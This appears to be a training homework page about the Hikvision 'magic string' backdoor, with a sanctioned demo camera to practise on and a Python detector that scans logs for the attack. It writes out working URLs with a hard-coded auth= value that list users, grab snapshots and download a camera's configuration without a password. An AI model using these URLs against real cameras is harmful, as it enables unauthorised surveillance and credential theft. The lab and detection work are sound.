Hack Our Camera!
This week we discussed cyber security and hacking. One of the most recent and widespread backdoor exploits is the Hikvision magic string. In this homework assignment you will access a Hikvision camera running vulnerable firmware.
IPVM has put a vulnerable Hikvision camera online for members to experiment with. Access details are:
http://hikvisionbackdoor.dyndns.org [NOTE: this will show a login page protected by a strong admin password]
However, due to the backdoor, an actor can execute Hikvision CGI commands by simply appending a string that authorizes access to the camera. Some examples are below (replace "camera.ip" with the actual IP address or URL of the camera):
Retrieve a list of all users and their roles:
http://camera.ip/Security/users?auth=YWRtaW46MTEK
Obtain a camera snapshot without authentication:
http://camera.ip/onvif-http/snapshot?auth=YWRtaW46MTEK
And worst of all, one can download the camera configuration:
http://camera.ip/System/configurationFile?auth=YWRtaW46MTEK
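For anyone responsible for monitoring cameras like this one, here is an added example (not part of the original assignment and not IPVM's or Hikvision's code) that flags logged requests carrying the "auth=" parameter shown in the URLs above. It assumes combined-format access logs from a reverse proxy or network sensor in front of the camera; the function names and the sample log lines are constructed for illustration.

```python
import base64
import binascii
import re
from urllib.parse import urlsplit, parse_qs

# Source address, request target and status from a combined-format log line.
REQUEST_RE = re.compile(
    r'^(?P<src>\S+) .*?"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)

def decode_auth(value):
    """Return the decoded auth= value if it is base64 of 'user:something', else None."""
    try:
        text = base64.b64decode(value, validate=True).decode("ascii")
    except (binascii.Error, UnicodeDecodeError, ValueError):
        return None
    text = text.strip()
    return text if ":" in text else None

def find_backdoor_requests(log_lines):
    """Return (source, path, status, decoded) for requests with a credential-shaped auth= value."""
    hits = []
    for line in log_lines:
        m = REQUEST_RE.match(line)
        if not m:
            continue
        url = urlsplit(m.group("target"))
        for value in parse_qs(url.query).get("auth", []):
            decoded = decode_auth(value)
            if decoded:
                hits.append((m.group("src"), url.path, int(m.group("status")), decoded))
    return hits

# Constructed sample log lines (documentation-range addresses, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2018:10:00:00 +0000] "GET /Security/users?auth=YWRtaW46MTEK HTTP/1.1" 200 512',
    '192.0.2.10 - - [01/Jan/2018:10:00:05 +0000] "GET /System/configurationFile?auth=YWRtaW46MTEK HTTP/1.1" 200 90112',
    '198.51.100.7 - - [01/Jan/2018:10:01:00 +0000] "GET /onvif-http/snapshot HTTP/1.1" 401 0',
    '198.51.100.7 - - [01/Jan/2018:10:02:00 +0000] "GET /index.html?auth=notbase64!! HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    for src, path, status, decoded in find_backdoor_requests(SAMPLE_LOG):
        print(f"{src} {path} -> HTTP {status} (auth decodes to {decoded!r})")
```

A 200 response on a flagged request means the camera honored the appended string, so the firmware should be treated as vulnerable and the configuration as disclosed.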
You can also use an app that was developed to change the password. See how creative you can get with this (without disabling the camera) and post your results here!
Post Your Results
Here is an example of what homework submissions should look like.
I used the app to change the password:
With access to the camera I then changed the OSD:
Please do not attempt this on any camera other than our demo camera, and keep results professional. If you have any questions please let us know - we are happy to help.